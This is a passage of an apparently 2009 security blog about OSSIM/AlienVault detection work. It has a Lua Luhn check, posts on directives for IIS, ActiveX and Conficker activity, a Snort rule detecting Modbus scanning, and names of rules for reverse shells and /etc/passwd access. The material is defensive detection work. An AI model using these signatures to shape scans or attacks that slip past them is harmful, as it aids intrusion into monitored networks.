	nDigits = card:len()
	odd = band(nDigits, 1)
	
	for count = 0,nDigits-1 do
		digit = tonumber(string.sub(card, count+1,count+1))
		if (bxor(band(count, 1),odd)) == 0 then
			digit = digit * 2
		end
		
		if digit > 9 then
			digit = digit - 9	
		end
		
		num = num + digit
		
	end
	return ((num % 10) == 0)
	
end

posted at: 19:51 | path: /Lua | permanent link to this entry | 0 comments |

Ossim: 0-day in Microsoft IIS 5/6 FTP
Tue, 01 Sep 2009

A 0-day exploit in Microsoft IIS 5/6 FTP was recently published on Milw0rm while HDMoore is porting the bug to Metasploit.

Alienvault's feed customers are protected with the directive released today:

45046 :AV Possible 0day IIS FTP Exploit against DST_IP

http://isc.sans.org/diary.html?storyid=7039

UPDATE:

We have previously coverage with two directives present on Alienvault Professional Feed:

45024: AV Possible FTP Exploit attempt against DST_IP

45025: AV Possible FTP Exploit attempt against DST_IP (FTP preprocessor)

posted at: 16:37 | path: /Ossim | permanent link to this entry | 0 comments |

Infocon raised to yellow for Excel Activex vulnerability
Tue, 14 Jul 2009

Microsoft has released an advisory related to Office Web Components Activex. The ISC has raised the Infocon to yellow due to the active exploitation of the vulnerability from several .cn domains.

Alienvault's feed customers are protected and covered with these directives:

45050: AV Possible Malicious Server exploiting Excel ActiveX Client against DST_IP (CVE-2009-1136)

45051: AV Possible Excel ActiveX Client side attack detected against SRC_IP (CVE-2009-1136)

45052: AV Possible Excel ActiveX Client Side Attack against DST_IP from a compromised host (CVE-2009-1136)

http://isc.sans.org/diary.html?storyid=6778

http://www.microsoft.com/technet/security/advisory/973472.mspx

Contact our Sales Team for more information about Alienvault Professional Feed. sales@alienvault.com

posted at: 08:24 | path: /Ossim | permanent link to this entry | 0 comments |

Ossim: 0-day in Microsoft DirectShow
Tue, 07 Jul 2009

A 0-day exploit in Microsoft Video ActiveX Control is being exploited by malicious sites. Many people is covering this vulnerability and seems that will be widely deployed.

Alienvault's feed customers are protected and covered with these directives:

45046:AV Possible MSVidCtl Client side attack detected against SRC_IP (KB-972890)

45047:AV Possible Malicious Server exploiting MSVidCt against DST_IP (KB-972890)

45048:AV Possible MSVidCt Client Side Attack against DST_IP from a compromised host (KB-972890)

45049:AV Possible MSVidCtl Client side attack detected against SRC_IP (KB-972890) 2

http://isc.sans.org/diary.html?storyid=6733

http://www.microsoft.com/technet/security/advisory/972890.mspx

Contact our Sales Team for more information about Alienvault Professional Feed. sales@alienvault.com

posted at: 12:46 | path: /Ossim | permanent link to this entry | 0 comments |

sobek-hids: Host Monitoring System
Sat, 20 Jun 2009

I've just created a google code's project with some code I wrote some time ago. Sobek-Hids is a python based Host IDS system capable to monitor:

Registry Changes

File Activity

Process Creation

Printing Jobs

External Drives (USB Disk Plugs)

Shared Resources

Windows Accounts

Logon

Firewall Changes

I hope I will have the time to continue and improve this couple of scripts.

You can find it at sobek-hids

posted at: 20:30 | path: /General | permanent link to this entry | 0 comments |

Snort: Rule to detect Modbus device fingerprinting
Tue, 21 Apr 2009

I've just published a snort rule to detect Scada Modbus Device fingerprinting tools like modscan:

alert tcp any any -> any 502 (msg:"ET SCAN Modbus Scanning detected"; content:"|00 00 00 00 00 02|"; depth:6; threshold: type both, track by_src, count 100, seconds 10; 
classtype:bad-unknown; reference:url,code.google.com/p/modscan/; reference:url,www.rtaautomation.com/modbustcp/; sid:2009286; rev:1;)

You caN find it at Emerging Threats

posted at: 15:55 | path: /Scada Security | permanent link to this entry | 0 comments |

Ntop: Testing l7-filter protocol detection patterns
Sun, 12 Apr 2009

I've wrote a little script to quickly test l7-filter protocol patterns used by ntop to detect protocol usage.

You have to install scapy, I' ve include some patterns from Ntop, include your owns on l7-patterns directory

You could read a pcap or capture from an interface.

Examples:

root@ubuntu:~/panalyzer# python l7Match.py -f http1.pcap
http
74.125.43.83 -> 192.168.1.131

root@ubuntu:~/proyectos/panalyzer# python l7Match.py -i eth0
ssl
88.221.225.51 -> 192.168.1.128
ssl
192.168.1.128 -> 88.221.225.51
ssl
88.221.225.51 -> 192.168.1.128
ssl
192.168.1.128 -> 88.221.225.51

posted at: 19:00 | path: /Ossim | permanent link to this entry | 0 comments |

April 1st, Conficker day
Tue, 31 Mar 2009

Tomorrow Conficker will activate a P2P system to coordinate to other infected machines over TCP and UDP, we've published a directive to detect the P2P behaviour.

Donwload Directive

posted at: 14:55 | path: /Ossim | permanent link to this entry | 2 comments |

Ossim: Shellcode Detection and Analysis
Tue, 10 Mar 2009

I'm glad to announce a new feature we have added to forensic console. We use libemu to make shellcode detection and analysis to help on forensic analysis and reduce false positives, an example:

posted at: 14:35 | path: /Ossim | permanent link to this entry | 0 comments |

Ossim: New Directives
Wed, 04 Mar 2009

I've just update the public CVS with some new directives as part of the effort we are doing to improve the upcoming installer:

Attacks:

Possible Successful Attack: Reverse Shell Access to the System

Possible POP3 Bruteforce against SRC_IP

Possible FTP Bruteforce against SRC_IP

Command execution against webserver on DST_IP

File /etc/passwd access on DST_IP

Possible SQL injection attempt against DST_IP

Possible attack against DST_IP (Symantec Remote Management RTVScan Exploit)

Possible sa account bruteforce against SRC_IP (SQL Server)

Possible VNC bruteforce against SRC_IP

Possible attack against DST_IP (Microsoft Server Service related attack)

Too many Cisco Firewall dropped events with destination DST_IP

Worms:

Possible Worm Infection against DST_IP

Possible Worm Infection against DST_IP via DCOM RPC vulnerability

Possible Worm Infection against DST_IP via Kill-Bill ASN1 vulnerability

Possible Worm Infection against DST_IP via Lsasrv.dll RPC vulnerability

Possible Worm Infection against DST_IP via WINS vulnerability

Possible attack against DST_IP (Microsoft Server Service related attack)

Possible worm scanning behavior on port DST_PORT

Misc:

Username gathering at SMTP server DST_IP

posted at: 17:08 | path: /Ossim | permanent link to this entry | 0 comments |

Ossim: Cross Correlation Rules Updated
Tue, 03 Feb 2009

I �ve just updated ossim Cross Correlation rules related to nessus-snort, check the cvs!! So, the basic rule for Cross Correlation is: if snort has discovered an attack to an IP, and we know that IP has that vulnerability, the reliability will change to 10. The relationships between nessus ID.s and snort vulnerabilities are stored in the table plugin_reference. If you want to do some kind of personalization, you have to insert data in this table. Check Personalize Cross Correlation. When a personalized Cross Correlation matches, the event adds the reliability of the new plugin to the old one.

posted at: 14:59 | path: /Ossim | permanent link to this entry | 0 comments |